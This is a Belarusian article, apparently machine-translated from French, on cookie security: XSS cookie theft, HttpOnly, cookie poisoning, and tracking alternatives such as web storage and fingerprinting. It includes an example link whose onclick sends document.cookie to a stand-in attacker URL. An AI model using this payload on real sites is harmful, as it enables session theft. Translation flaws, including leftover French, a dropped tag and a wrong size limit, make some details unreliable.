Іншы спосаб скрасці файлы cookie - гэта стварыць сцэнарыі для сайтаў і прымусіць сам браўзер адпраўляць файлы cookie на шкоднасныя серверы, якія ніколі іх не атрымліваюць. Сучасныя браўзеры дазваляюць выконваць патрэбныя часткі кода з сервера. Калі доступ да файлаў cookie ажыццяўляецца падчас выканання, іх значэнні могуць быць перададзены ў той ці іншай форме серверам, якія не павінны мець да іх доступ. Шыфраванне файлаў cookie перад іх адпраўкай па сетцы не дапамагае прадухіліць атаку.

Гэты тып унутрысайтавых сцэнарыяў звычайна выкарыстоўваецца зламыснікамі на сайтах, якія дазваляюць карыстальнікам размяшчаць HTML-кантэнт. Інтэгруючы частку сумяшчальнага кода ў HTML, зламыснік можа атрымліваць файлы cookie ад іншых карыстальнікаў. Веданне гэтых файлаў cookie можа быць выкарыстана шляхам падлучэння да таго ж сайта з выкарыстаннем скрадзеных файлаў cookie, такім чынам, вас прызнаюць карыстальнікам, чые файлы cookie былі скрадзены.

Адзін са спосабаў прадухіліць такія атакі - выкарыстоўваць сцяг HttpOnly; гэта опцыя, уведзеная з версіі 6 Internet Explorer у PHP з версіі 5.2.0, якая плануецца зрабіць файл cookie недаступным для кліента побач са сцэнарыем. Аднак вэб-распрацоўшчыкі павінны ўлічваць гэта пры распрацоўцы сваіх сайтаў, каб яны былі застрахаваны ад сцэнарыяў на сайце.

Яшчэ адна выкарыстоўваная пагроза бяспекі - гэта фальсіфікацыя патрабаванняў на сайце.

Афіцыйная тэхнічная спецыфікацыя дазваляе адпраўляць файлы cookie толькі на серверы дамена, з якога яны паходзяць. Аднак значэнне файлаў cookie можа быць адпраўлена на іншыя серверы з дапамогай іншых сродкаў, акрамя загалоўкаў файлаў cookie.

У прыватнасці, такія мовы сцэнарыяў, як JavaScript, звычайна маюць доступ да значэнняў cookie і могуць адпраўляць адвольныя значэнні на любы сервер у Інтэрнэце. Гэтая магчымасць сцэнарыяў выкарыстоўваецца на вэб-сайтах, якія дазваляюць карыстальнікам размяшчаць HTML-кантэнт для прагляду іншымі карыстальнікамі.

Напрыклад, зламыснік, які дзейнічае на дамене example.com, можа размясціць каментар, які змяшчае наступную спасылку, якая паказвае на папулярны блог, які ён інакш не кантралюе:

<a href="#" onclick="window.location = 'http://exemple.com/stole.cgi?text=' + escape(document.cookie); return false;">Cliquez ici !</a>

Калі іншы карыстальнік націскае на гэтую спасылку, браўзер выконвае частку кода з атрыбутам onclick, таму радок document.cookie замяняецца спісам файлаў cookie карыстальніка, актыўных для гэтай старонкі. Такім чынам, гэты спіс файлаў cookie адпраўляецца на сервер example.com, і таму зламыснік можа збіраць файлы cookie гэтага карыстальніка.

Гэты тып атакі цяжка выявіць на баку карыстальніка, таму што скрыпт паходзіць з таго ж дамена, што ўсталяваў файлы cookie, і аперацыя па адпраўцы значэнняў, здаецца, аўтарызавана гэтым даменам. Лічыцца, што ўвядзенне абмежаванняў, якія прадухіляюць публікацыю шкоднаснага кода, з'яўляецца абавязкам адміністратараў, якія кіруюць гэтым тыпам сайтаў.

Файлы cookie непасрэдна не бачныя праграмам на баку кліента, такім як JavaScript, калі яны былі адпраўлены са сцягам HttpOnly. З пункту гледжання сервера розніца толькі ў тым, што ў радок загалоўка Set-Cookie дадаецца новае поле, якое змяшчае радок HttpOnly:

Set-Cookie: RMID=732423sdfs73242; expires=Fri, 31-Dec-2010 23:59:59 GMT; path=/; domain=.exemple.net; HttpOnly

Калі браўзер атрымлівае такі файл cookie, ён павінен звычайна выкарыстоўваць яго ў наступным абмене HTTP, але не робячы яго бачным для сцэнарыяў, якія выконваюцца на баку кліента. Сцяг HttpOnly не з'яўляецца часткай афіцыйнай тэхнічнай спецыфікацыі і не рэалізаваны ва ўсіх браўзерах. Звярніце ўвагу, што ў цяперашні час няма магчымасці прадухіліць чытанне і запіс файлаў cookie сесіі метадам XMLHTTPRequest.

Мадыфікацыя кантэнту: зламыснік адпраўляе на сервер несапраўдны файл cookie, які, магчыма, зроблены з сапраўднага файла cookie, адпраўленага серверам.

Змена файлаў cookie

Як толькі файлы cookie неабходна захаваць і вярнуць на сервер у нязменным выглядзе, зламыснік можа змяніць значэнне файлаў cookie, перш чым яны будуць адпраўлены назад на сервер. Напрыклад, калі файл cookie змяшчае агульную суму, якую карыстальнік павінен заплаціць за тавары, размешчаныя ў кошыку крамы, змяненне гэтага значэння падвяргае сервер рызыцы спаганяць са зламысніка меншую цану, чым пачатковая. Працэс змены значэння файлаў cookie называецца атручэнне печывам і можа выкарыстоўвацца пасля крадзяжу печыва, каб зрабіць атаку пастаяннай.

У метадзе адмены файлаў cookie зламыснік выкарыстоўвае збой браўзера, каб адправіць на сервер несапраўдны файл cookie.

Большасць вэб-сайтаў, аднак, захоўваюць толькі ідэнтыфікатар сесіі - выпадкова згенераваны унікальны нумар, які выкарыстоўваецца для ідэнтыфікацыі карыстальніка сесіі - у самім файле cookie, а ўся іншая інфармацыя захоўваецца на серверы. У гэтым выпадку гэтая праблема шмат у чым вырашаецца.

Апрацоўка файлаў cookie паміж вэб-сайтамі

Чакаецца, што кожны сайт будзе мець свае ўласныя файлы cookie, таму адзін сайт не павінен мець магчымасць змяняць або ствараць файлы cookie, звязаныя з іншым сайтам. Праблема бяспекі вэб-браўзера можа дазволіць шкоднасным сайтам парушыць гэта правіла. Выкарыстанне такога недахопу звычайна называюць межсайтовая кулінарыя. Мэтай такіх нападаў можа быць крадзеж ідэнтыфікатара сесіі.

Карыстальнікі павінны выкарыстоўваць апошнія версіі вэб-браўзераў, у якіх гэтыя ўразлівасці практычна ліквідаваны.

Канфлікт паміж кліентам і серверам

Выкарыстанне файлаў cookie можа выклікаць супярэчнасць паміж станам кліента і станам, захаваным у файлах cookie. Калі карыстальнік атрымлівае файл cookie і націскае на кнопку "Назад" у браўзеры, стан браўзера звычайна не такі, як да гэтага набыцця. Напрыклад, калі кошык інтэрнэт-крамы створаны з выкарыстаннем файлаў cookie, змесціва кошыка не можа змяніцца, калі карыстальнік вяртаецца да гісторыі браўзера: калі карыстальнік націскае кнопку для дадання артыкула ў свой кошык і націскае кнопку «Вярнуцца», ", артыкул застаецца ў гэтым. Гэта не можа быць намерам карыстальніка, які, безумоўна, хоча адмяніць даданне артыкула. Гэта можа прывесці да ненадзейнасці, блытаніны і памылак. Такім чынам, вэб-распрацоўшчыкі павінны ведаць аб гэтай праблеме і прымаць меры для вырашэння падобных сітуацый.

Тэрмін дзеяння файлаў cookie

Пастаянныя файлы cookie падвяргаюцца крытыцы з боку экспертаў па бяспецы канфідэнцыяльнасці за тое, што іх тэрмін дзеяння не заканчваецца досыць хутка, што дазваляе вэб-сайтам адсочваць карыстальнікаў і ствараць іх профілі з цягам часу. Гэты аспект файлаў cookie таксама з'яўляецца часткай праблемы захопу сесіі, таму што скрадзеныя пастаянныя файлы cookie могуць выкарыстоўвацца для выдачы сябе за карыстальніка на працягу значнага перыяду часу.

Чытайце таксама: ГАФАМ: хто яны? Чаму яны (часам) такія страшныя?

Альтэрнатывы печывам

Некаторыя аперацыі, якія можна выканаць з выкарыстаннем файлаў cookie, таксама можна выканаць з дапамогай іншых механізмаў, якія абыходзяць файлы cookie або аднаўляюць выдаленыя файлы cookie, што стварае праблемы з канфідэнцыяльнасцю такім жа чынам (а часам і горш, таму што яны нябачныя), чым файлы cookie.

IP-адрас

За карыстальнікамі можна адсочваць IP-адрас кампутара, які выклікае старонку. Гэтая тэхніка была даступная з моманту з'яўлення Сусветнай павуціны, калі старонкі спампоўваюцца, сервер запытвае IP-адрас кампутара, на якім працуе браўзер або проксі, калі яны не выкарыстоўваюцца. Сервер можа адсочваць гэтую інфармацыю незалежна ад таго, выкарыстоўваюцца ці не файлы cookie. Аднак гэтыя адрасы звычайна менш надзейныя для ідэнтыфікацыі карыстальніка, чым файлы cookie, таму што камп'ютары і проксі-серверы могуць быць агульнымі для некалькіх карыстальнікаў, і адзін і той жа кампутар можа атрымліваць розныя IP-адрасы падчас кожнай працоўнай сесіі (напрыклад, гэта часта бывае пры тэлефонных злучэннях) .

Адсочванне па IP-адрасах можа быць надзейным у некаторых сітуацыях, напрыклад, пры шырокапалосных злучэннях, якія падтрымліваюць адзін і той жа IP-адрас на працягу доўгага часу, пакуль сілкаванне ўключана.

Некаторыя сістэмы, такія як Tor, прызначаны для падтрымання ананімнасці ў Інтэрнэце і робяць адсочванне па IP-адрасе немагчымым або немэтазгодным.

URL

Больш дакладны метад заснаваны на ўбудаванні інфармацыі ў URL. Частка радка запыту URL - гэта адзін з метадаў, які звычайна выкарыстоўваецца для гэтай мэты, але можна выкарыстоўваць і іншыя часткі. Гэты метад выкарыстоўваецца і ў Java-серверлеце, і ў PHP-сесіі, калі файлы cookie не ўключаны.

Гэты метад прадугледжвае даданне вэб-серверам радковых запытаў да спасылак на вэб-старонцы, якая іх змяшчае пры адпраўцы ў браўзер. Калі карыстальнік пераходзіць па спасылцы, браўзер вяртае далучаны радок запыту на сервер.

Радкі запытаў, якія выкарыстоўваюцца для гэтай мэты, і файлы cookie вельмі падобныя, абодва з'яўляюцца інфармацыяй, якую адвольна выбірае сервер і вяртае браўзер. Аднак ёсць некаторыя адрозненні: калі URL, які змяшчае радок запыту, выкарыстоўваецца паўторна, тая ж інфармацыя адпраўляецца на сервер. Напрыклад, калі перавагі карыстальніка закадзіраваны ў радку запыту URL-адраса і карыстальнік адпраўляе гэты URL іншаму карыстальніку па электроннай пошце, гэты карыстальнік таксама зможа выкарыстоўваць гэтыя параметры.

З іншага боку, калі карыстальнік атрымлівае доступ да адной і той жа старонкі двойчы, няма ніякай гарантыі, што адзін і той жа радок запыту будзе выкарыстоўвацца абодва разы. Напрыклад, калі карыстальнік трапляе на старонку з унутранай старонкі сайта ў першы раз і трапляе на тую ж старонку з вонкавай старонкі ў другі раз, радок запыту адносна старонкі сайта звычайна адрозніваецца, а файлы cookie аднолькавыя .

Іншыя недахопы радкоў запытаў звязаны з бяспекай: захаванне даных, якія ідэнтыфікуюць сесію, у радках запытаў дазваляе або спрашчае атакі фіксацыі сесіі, атакі спасылкі на ідэнтыфікатар і іншыя эксплойты. Перадача ідэнтыфікатараў сесіі ў выглядзе файлаў cookie HTTP больш бяспечная.

Схаванае поле формы

Адной з формаў адсочвання сесіі, якая выкарыстоўваецца ASP.NET, з'яўляецца выкарыстанне вэб-форм са схаванымі палямі. Гэты метад вельмі падобны да выкарыстання радкоў URL-запыту для перадачы інфармацыі і мае тыя ж перавагі і недахопы; і калі форма апрацоўваецца метадам HTTP GET, палі фактычна становяцца часткай URL браўзера, які адправіць іх пры адпраўцы формы. Але большасць формаў апрацоўваюцца з дапамогай HTTP POST, у выніку чаго інфармацыя формы, уключаючы схаваныя палі, дадаецца ў якасці дадатковага ўводу, які не з'яўляецца ні часткай URL-адраса, ні файла cookie.

Гэты падыход мае дзве перавагі з пункту гледжання адсочвання: па-першае, адсочванне інфармацыі, размешчанай у зыходным кодзе HTML і POST, а не ў URL, дазволіць звычайнаму карыстальніку пазбегнуць гэтага адсочвання; па-другое, інфармацыя аб сеансе не капіюецца, калі карыстальнік капіюе URL (напрыклад, каб захаваць старонку на дыск або адправіць яе па электроннай пошце).

window.name

Усе распаўсюджаныя вэб-браўзеры могуць захоўваць даволі вялікі аб'ём даных (ад 2 МБ да 32 МБ) праз JavaScript, выкарыстоўваючы ўласцівасць window.name DOM. Гэтыя даныя могуць выкарыстоўвацца замест сеансавых файлаў cookie, а таксама выкарыстоўваюцца ў розных даменах. Тэхніка можа спалучацца з аб'ектамі JSON для захоўвання складанага набору зменных сеанса на баку кліента.

Недахопам з'яўляецца тое, што кожнае асобнае акно або ўкладка першапачаткова будзе мець пустое window.name; пры праглядзе па ўкладках (адкрытых карыстальнікам) гэта азначае, што ўкладкі, адкрытыя паасобку, не будуць мець назвы вокнаў. Акрамя таго, window.name можна выкарыстоўваць для адсочвання наведвальнікаў на розных сайтах, што можа выклікаць праблему прыватнасці.

У некаторых аспектах гэта можа быць больш бяспечным, чым файлы cookie, з-за таго, што сервер не ўдзельнічае, што робіць яго непаражальным для сеткавых атак файлаў cookie сніфера. Аднак, калі для абароны даных прыняты спецыяльныя меры, яны становяцца ўразлівымі для наступных нападаў, бо даныя даступныя праз іншыя сайты, адкрытыя ў тым жа акне.

Аўтэнтыфікацыя HTTP

Пратакол HTTP уключае асноўныя пратаколы аўтэнтыфікацыі доступу і дайджэст аўтэнтыфікацыі доступу, які дазваляе атрымаць доступ да вэб-старонкі толькі тады, калі карыстальнік увёў імя карыстальніка і пароль. Калі сервер запытвае сертыфікат для прадастаўлення доступу да вэб-старонкі, браўзер запытвае яго ў карыстальніка і пасля атрымання захоўвае яго і адпраўляе ва ўсіх наступных HTTP-запытах. Гэтую інфармацыю можна выкарыстоўваць для адсочвання карыстальніка.

Лакальны агульны аб'ект

Калі браўзер уключае плагін Adobe Flash Player, то мясцовыя агульныя аб'екты можна выкарыстоўваць для тых жа мэт, што і файлы cookie. Яны могуць быць прывабным выбарам для вэб-распрацоўшчыкаў, таму што:

• ліміт памеру па змаўчанні для лакальнага агульнага аб'екта складае 100 КБ;
• праверкі бяспекі асобныя ад праверкі кукі-файлаў карыстальнікаў (так што лакальныя агульныя аб'екты могуць быць дазволеныя, калі кукі-файлы не дазволены).

Гэты апошні пункт адрознівае палітыку кіравання файламі cookie ад палітыкі лакальных агульных аб'ектаў Adobe выклікае пытанні адносна кіравання карыстальнікам сваімі наладамі прыватнасці: ён павінен ведаць, што яго кіраванне файламі cookie не ўплывае на кіраванне лакальнымі агульнымі аб'ектамі, і наадварот.

Яшчэ адна крытыка гэтай сістэмы заключаецца ў тым, што яе можна выкарыстоўваць толькі праз плагін Adobe Flash Player, які з'яўляецца запатэнтаваным, а не вэб-стандартам.

Настойлівасць на баку кліента

Некаторыя вэб-браўзеры падтрымліваюць механізм захавання на аснове скрыптоў, які дазваляе старонцы захоўваць інфармацыю лакальна для наступнага выкарыстання. Internet Explorer, напрыклад, падтрымлівае пастаянную інфармацыю ў гісторыі браўзера, закладках, у фармаце, які захоўваецца ў XML, або непасрэдна з вэб-старонкі, захаванай на дыску. Для Microsoft Internet Explorer 5 існуе метад карыстацкіх даных, даступны праз паводзіны DHTML.

W3C прадставіў у HTML 5 новы API JavaScript для захоўвання дадзеных на баку кліента пад назвай Web storage і накіраваны на пастаянную замену файлаў cookie. Гэта падобна на файлы cookie, але са значна палепшанай ёмістасцю і без захавання інфармацыі ў загалоўку HTTP-запытаў. API дазваляе захоўваць два тыпы вэб-сховішчаў: лакальнае сховішча і сесійнае сховішча, падобныя на пастаянныя файлы cookie і сеансавыя файлы cookie (за выключэннем таго, што тэрмін дзеяння сеансавых файлаў cookie заканчваецца, калі браўзер зачынены, пакуль захоўванне сесіі заканчваецца пры закрыцці ўкладкі), адпаведна. Інтэрнэт-сховішча падтрымліваецца Mozilla Firefox 3.5, Google Chrome 5, Apple Safari 4, Microsoft Internet Explorer 8 і Opera 10.50.

Іншы механізм звычайна абапіраецца на кэшаванне браўзера (у памяці, а не на абнаўленні) з дапамогай праграм JavaScript на вэб-старонках. 

Напрыклад, старонка можа ўтрымліваць тэг . La première fois que la page se charge, le programme exemple.js est aussi chargé. 

У гэты момант праграма застаецца ў кэш-памяці, а наведаная старонка не перазагружаецца другі раз. Такім чынам, калі праграма змяшчае глабальную зменную (напрыклад, var id = 3243242;), гэты ідэнтыфікатар застаецца сапраўдным і можа быць выкарыстаны іншым кодам JavaScript пасля таго, як старонка загрузіцца зноў, або калі загрузіцца старонка, якая спасылаецца на праграму. 

Асноўным недахопам гэтага метаду з'яўляецца тое, што глабальная зменная JavaScript павінна быць статычнай, гэта значыць яе нельга змяніць або выдаліць, як файлы cookie.

адбітак пальца вэб-браўзэра

Адбітак пальца браўзера - гэта інфармацыя, сабраная аб параметрах канфігурацыі браўзера ў мэтах ідэнтыфікацыі. Гэтыя адбіткі пальцаў можна выкарыстоўваць для поўнай або частковай ідэнтыфікацыі карыстальніка Інтэрнэту або прылады, нават калі файлы cookie адключаны.

Асноўная інфармацыя аб канфігурацыі вэб-браўзера доўгі час збіралася службамі аўдыторыі вэб-сайтаў з мэтай дакладнага вымярэння чалавечага вэб-трафіку і выяўлення розных формаў махлярства. З дапамогай моў сцэнарыяў на баку кліента збор інфармацыі значна больш дакладны цяпер магчыма.

Пераўтварэнне гэтай інфармацыі ў бітавы радок стварае адбітак пальца прылады. У 2010 годзе Electronic Frontier Foundation (EFF) вымерала энтрапію адбітка пальца браўзера як мінімум 18,1 біты, і гэта было да таго, як развіццё адбіткаў пальцаў на палатне дадало да гэтай энтрапіі 5,7 біта.

Печыва ў двух словах

Cookies - гэта невялікія тэкставыя файлы, якія захоўваюцца вэб-браўзерам на цвёрдым дыску наведвальніка сайта і выкарыстоўваюцца (сярод іншага) для запісу інфармацыі аб наведвальніку або яго падарожжы па сайце. Такім чынам вэб-майстар можа распазнаць звычкі наведвальніка і персаналізаваць прэзентацыю свайго сайта для кожнага наведвальніка; затым файлы cookie дазваляюць запомніць, колькі артыкулаў паказаць на галоўнай старонцы, або нават захаваць уліковыя дадзеныя для ўваходу для любой прыватнай асобы: калі наведвальнік вяртаецца на сайт, яму больш не трэба ўводзіць сваё імя і пароль для быць распазнанымі, бо яны аўтаматычна чытаюцца ў файлах cookie.

Файл cookie мае абмежаваны тэрмін службы, які ўсталёўваецца дызайнерам сайта. Яны таксама могуць скончыцца ў канцы сесіі на сайце, што адпавядае закрыццю браўзера. Файлы cookie шырока выкарыстоўваюцца для палягчэння жыцця наведвальнікаў і прадастаўлення ім больш актуальнай інфармацыі. Але спецыяльныя метады дазваляюць сачыць за наведвальнікам на некалькіх сайтах і такім чынам збіраць і пераправяраць вельмі шырокую інфармацыю аб яго звычках. Дзякуючы гэтаму метаду выкарыстанне файлаў cookie атрымала рэпутацыю метаду назірання, які парушае канфідэнцыяльнасць наведвальнікаў, што, на жаль, адпавядае рэчаіснасці ў многіх выпадках выкарыстання па нетэхнічных прычынах або непавагі да чаканняў карыстальнікаў. .

У адказ на гэтыя законныя асцярогі HTML 5 прадстаўляе новы API JavaScript для захоўвання даных на баку кліента, які называецца вэб-сховішчам, значна больш бяспечным і з большай ёмістасцю, які накіраваны на замену файлаў cookie.

Захоўванне файлаў cookie

У некаторых браўзерах файлы cookie можна лёгка рэдагаваць, дастаткова простага тэкставага рэдактара, напрыклад Notepad, каб змяніць яго значэнні ўручную.

Файлы cookie захоўваюцца па-рознаму ў залежнасці ад браўзера:

• Microsoft Internet Explorer захоўвае кожны файл cookie ў іншым файле;
• Mozilla Firefox захоўвае ўсе файлы cookie ў адным файле;
• Опера захоўвае ўсе файлы cookie ў адным файле і шыфруе іх (змяніць іх немагчыма, за выключэннем параметраў праграмнага забеспячэння);
• Apple Safari захоўвае ўсе файлы cookie ў адным файле з пашырэннем .plist. Мадыфікацыя магчымая, але не вельмі простая, калі вы не пяройдзеце праз параметры праграмнага забеспячэння.

Патрабуецца падтрымка браўзераў мінімальная :

• 300 адначасовых печыва;
• 4 o за печыва;
• 20 файлаў cookie на хост або дамен.